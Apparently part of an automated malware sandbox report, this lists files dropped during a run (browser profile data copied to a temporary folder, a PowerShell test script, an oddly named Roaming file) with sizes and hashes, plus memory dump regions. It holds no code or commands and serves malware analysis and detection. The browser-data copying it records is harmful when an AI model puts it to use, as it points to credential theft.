4c0eeceabe59112672b1936a4aeb00639e83f87eb3d02134afc9048e2c6f2ded1d28a569517aad6de787c9263a1f0e989059fbaeb66b0da50415b91e973f1ef2

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

Filesize
80B

MD5
69449520fd9c139c534e2970342c6bd8

SHA1
230fe369a09def748f8cc23ad70fd19ed8d1b885

SHA256
3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277

SHA512
ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

Filesize
263B

MD5
723f174c7f1c30e4c2c5c8d1c958fbc3

SHA1
95e027fc3d4fe084957d42a14f10b1f2e6548f14

SHA256
fdec5af5701ec897de96a9cb77cbb2fadc17b5baf437541675965acead307fcf

SHA512
7613b3ce490f90beb4afe12df3af39037501359d6e15fb1f04db1bb4c63c6576efc829f86347855edba8388a5fbc22087dc4e117b6a9aa2a2eae124dd8419adc

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

Filesize
40B

MD5
148079685e25097536785f4536af014b

SHA1
c5ff5b1b69487a9dd4d244d11bbafa91708c1a41

SHA256
f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8

SHA512
c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

Filesize
291B

MD5
778655b25a55e1d30afac7cb2c53930a

SHA1
bfc5fa974b541ebd2da9b338cb4315f43a0ce29c

SHA256
789573fecf67ac004aa44c4a92695cc5b6c9a4a79536453ea8fef5dfd56fd5f9

SHA512
d700258e6c0bda5c9e0ea7d387e986fd6f7ce3c52c2edce8430d13585add9ff62a98c1c7321f0f542e4094a66ef08ac7456f418dc174ce35b00635b6149eadb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

Filesize
46B

MD5
90881c9c26f29fca29815a08ba858544

SHA1
06fee974987b91d82c2839a4bb12991fa99e1bdd

SHA256
a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a

SHA512
15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

Filesize
267B

MD5
7a23db671ecc6fbada05ecbb1b896449

SHA1
2c32bf9e5bee9f4966e6eedd6e7a71727c4a2c61

SHA256
6741ba34de0bfe745cb1132c38d9020e8c4a462fc2ec5083d7842d33a39cfdc1

SHA512
ddd1a2f517a24a11d3caf5dddd7cdf26082b7c1454c234dd0deff44261bc3768e6e66800ef112ee940d7553df3cdafec19208601a79953552f0bff7a8dc9e1ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

Filesize
20KB

MD5
986962efd2be05909f2aaded39b753a6

SHA1
657924eda5b9473c70cc359d06b6ca731f6a1170

SHA256
d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889

SHA512
e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

Filesize
128KB

MD5
0c757568a7284c457fa95e0412f6297f

SHA1
2f69237e146567ff9fae68ef912ef9fd5b630d03

SHA256
2f1ffcae40d1314385e6d0fc31c2cec1d7ecc4edf878c378193fcda72ad7f949

SHA512
978835358c6d60566c51a2ee92ffb5e4c4ac268cde1c270fb618303bb21d7e1c00e13a883be02573a4a370489f8a28f101fb84033ec6343f353d813e5d37b221

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

Filesize
114KB

MD5
d3c286e1f056351c95f6988285dd9f8f

SHA1
8b0c1566470c4006aaed5ac807d592f092b6f218

SHA256
6f838646d8755caf25afe0c4fa66f6e7e7b2a998123547e0d1ac74d3875460c3

SHA512
f0b82321bcf0c7a404386e9e75e6b0f10bb466aa55bdd4662b36b20508331ab87b711d74c42926262463f3213af1dd6828f9470c849b525b64c8718f4a3b5595

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

Filesize
4KB

MD5
03247c8c13b9f8c38ea1c51b37dbae09

SHA1
2396b5c0b56097f25aad4f78e7e44479917b952e

SHA256
113d860fe56852fe986cb689522f4b77e65e828dcec2de468b58973ce0ff3c6a

SHA512
3b9cc4a8e0104dd4e5d5f8ee491b545fbe97edc9665eddedbd15d0cf394dc183fde910e4ee07dfd6c051be0e12c7b69116b640c41feb0ec41c43b51d522e8919

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

Filesize
265B

MD5
25af387870960ea89fbcc99d9d1ef73f

SHA1
f6557e2b6991412a63568720d81c45d971cafac8

SHA256
e6b91aab0961bfd3259d95310d4bf12626cca00f276ba761a5852aaeec3886f6

SHA512
498c912fc458bc1cd1ae3ac939dfa612c7f7b8c609420c5e36901d32d06022a0a1c5c75a5236c31b4c064bd86300592a2e6f42b02171d478ce760aa83ed9b7ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

Filesize
682B

MD5
93d78fe13e945090dd620a7cd4da080d

SHA1
3f1bdf2101f6f1f64edf566d5fe0b84118e041e5

SHA256
b48c2d8a9c3ea4130ec0116ab8679dadd48b9759914460c1d82cf8122edd296d

SHA512
95aa57c9f886b474d12e656b5a19bf19b104434e64e5ae7286b375613fdb81bd8978d8b9256771b326bfa4aa2c942663e7aaaf8981d4033d9a72b1a2366aa42d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

Filesize
283B

MD5
0ed118fcfbedc283c43d9278524ffec1

SHA1
7bb074b1221712898b16e2181bc173fd662a8a09

SHA256
b347834f19cb9017029d2adb32a143dde121d651bc5a712677ff43a7ed8cdbb2

SHA512
afb2bdf90f27e44b096882452687aa119c68acae87006f4cae38c8468ff97179a47a69e7f0afee0194d1b63f3ba1bdd69b4d0d15187a090e091418b6c658f940

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

Filesize
264KB

MD5
d0d388f3865d0523e451d6ba0be34cc4

SHA1
8571c6a52aacc2747c048e3419e5657b74612995

SHA256
902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

SHA512
376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

Filesize
8KB

MD5
2b59264131e10fe1d09eb63f19dafe1b

SHA1
acbf72ef967ef87b2f47060e1013f298be7d9052

SHA256
90f8cf3153fd2a6de4581e51bea520db1242c1d01ad59bcbdffbbe2c301578c2

SHA512
0536b258d8c85910cdc3998a835b1f799b8bff4b3e3e2bbf7c5442fa24850f4d4b67c8bac443a04470026f263e22ac1ea6302c71f81b357dcb78d56ea65a03b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

Filesize
116KB

MD5
4bb64c80d14a8dafaa79c8af014a02c1

SHA1
6cbb54ad512ef49f0a8af0841bec1c6128d7a74f

SHA256
fc41cfc6372ec6bda87ea3eff52828a1519e12d245ea4ca7bc3fdf69340c5841

SHA512
f57fec2fe71ff1458ce19099c997d34d930abe9f6e8a71f43ebc85c3e4a278de219dabb7236bfdb2445002d4f1512a1a22b2b9d2cf34cf5ade6b6eb4366b1e56

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ya350nib.4wy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xgktxxqleafnhtevii

Filesize
4KB

MD5
17eece3240d08aa4811cf1007cfe2585

SHA1
6c10329f61455d1c96e041b6f89ee6260af3bd0f

SHA256
7cc0db44c7b23e4894fe11f0d8d84b2a82ad667eb1e3504192f3ba729f9a7903

SHA512
a7de8d6322410ec89f76c70a7159645e8913774f38b84aafeeeb9f90dc3b9aa74a0a280d0bb6674790c04a8ff2d059327f02ebfda6c4486778d53b7fc6da6370

Download Submit
C:\Users\Admin\AppData\Roaming\Epitympanum.Ply

Filesize
404KB

MD5
02520ab781931d06c03af0071b4cbe02

SHA1
1a35dae7b75807fb4cb35e06ee57cba219710491

SHA256
dd89e82b3e8fd742b6c039805c442693d61d25dfcd3804bc0d2ad19ff0d0e0e8

SHA512
27f47814f3061d9c86e1cd6654d8b9e3f1ccbf38ce1379f88a946ff4e0e4a16c32300f7541b6098bc03a14752cfe780b4b5efde8ec740522d113dffd838dae9e

Download Submit
\??\pipe\crashpad_548_MTYIMQVGWSGPLHHF

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/64-71-0x0000000021C40000-0x0000000021C74000-memory.dmp

Filesize
208KB

Download
memory/64-64-0x00000000012F0000-0x0000000002544000-memory.dmp

Filesize
18.3MB

Download
memory/64-209-0x0000000021D20000-0x0000000021D39000-memory.dmp

Filesize
100KB

Download
memory/64-72-0x0000000021C40000-0x0000000021C74000-memory.dmp

Filesize
208KB

Download
memory/64-213-0x0000000021D20000-0x0000000021D39000-memory.dmp

Filesize
100KB

Download
memory/64-212-0x0000000021D20000-0x0000000021D39000-memory.dmp

Filesize
100KB

Download
memory/64-68-0x0000000021C40000-0x0000000021C74000-memory.dmp

Filesize
208KB

Download
memory/64-62-0x00000000012F0000-0x0000000002544000-memory.dmp

Filesize
18.3MB

Download
memory/864-206-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/864-205-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/864-204-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1120-194-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1120-200-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1120-198-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2480-193-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2480-195-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2480-197-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2480-199-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3824-44-0x0000000006080000-0x000000000609A000-memory.dmp

Filesize
104KB

Download
memory/3824-28-0x0000000004CC0000-0x0000000004D26000-memory.dmp

Filesize
408KB

Download
memory/3824-47-0x0000000007F40000-0x00000000084E4000-memory.dmp

Filesize
5.6MB

Download
memory/3824-46-0x0000000006CE0000-0x0000000006D02000-memory.dmp

Filesize
136KB

Download
memory/3824-45-0x0000000006D80000-0x0000000006E16000-memory.dmp

Filesize
600KB

Download
memory/3824-25-0x0000000002200000-0x0000000002236000-memory.dmp

Filesize
216KB

Download
memory/3824-43-0x0000000007310000-0x000000000798A000-memory.dmp

Filesize
6.5MB

Download
memory/3824-42-0x0000000005AF0000-0x0000000005B3C000-memory.dmp

Filesize
304KB

Download
memory/3824-41-0x0000000005AD0000-0x0000000005AEE000-memory.dmp

Filesize
120KB

Download
memory/3824-36-0x0000000005500000-0x0000000005854000-memory.dmp

Filesize
3.3MB

Download
memory/3824-29-0x0000000004DA0000-0x0000000004E06000-memory.dmp

Filesize
408KB

Download
memory/3824-49-0x00000000084F0000-0x000000000B833000-memory.dmp

Filesize
51.3MB

Download
memory/3824-27-0x0000000004C20000-0x0000000004C42000-memory.dmp

Filesize
136KB

Download
memory/3824-26-0x0000000004ED0000-0x00000000054F8000-memory.dmp

Filesize
6.2MB

Download
memory/4656-4-0x00007FFE54FA3000-0x00007FFE54FA5000-memory.dmp

Filesize
8KB

Download
memory/4656-24-0x00007FFE54FA0000-0x00007FFE55A61000-memory.dmp

Filesize
10.8MB

Download
memory/4656-21-0x00007FFE54FA0000-0x00007FFE55A61000-memory.dmp

Filesize
10.8MB

Download
memory/4656-19-0x00007FFE54FA0000-0x00007FFE55A61000-memory.dmp

Filesize
10.8MB

Download
memory/4656-18-0x00007FFE54FA3000-0x00007FFE54FA5000-memory.dmp

Filesize
8KB

Download
memory/4656-16-0x00007FFE54FA0000-0x00007FFE55A61000-memory.dmp

Filesize
10.8MB

Download
memory/4656-15-0x00007FFE54FA0000-0x00007FFE55A61000-memory.dmp

Filesize
10.8MB

Download
memory/4656-5-0x00000181218F0000-0x0000018121912000-memory.dmp

Filesize
136KB

Download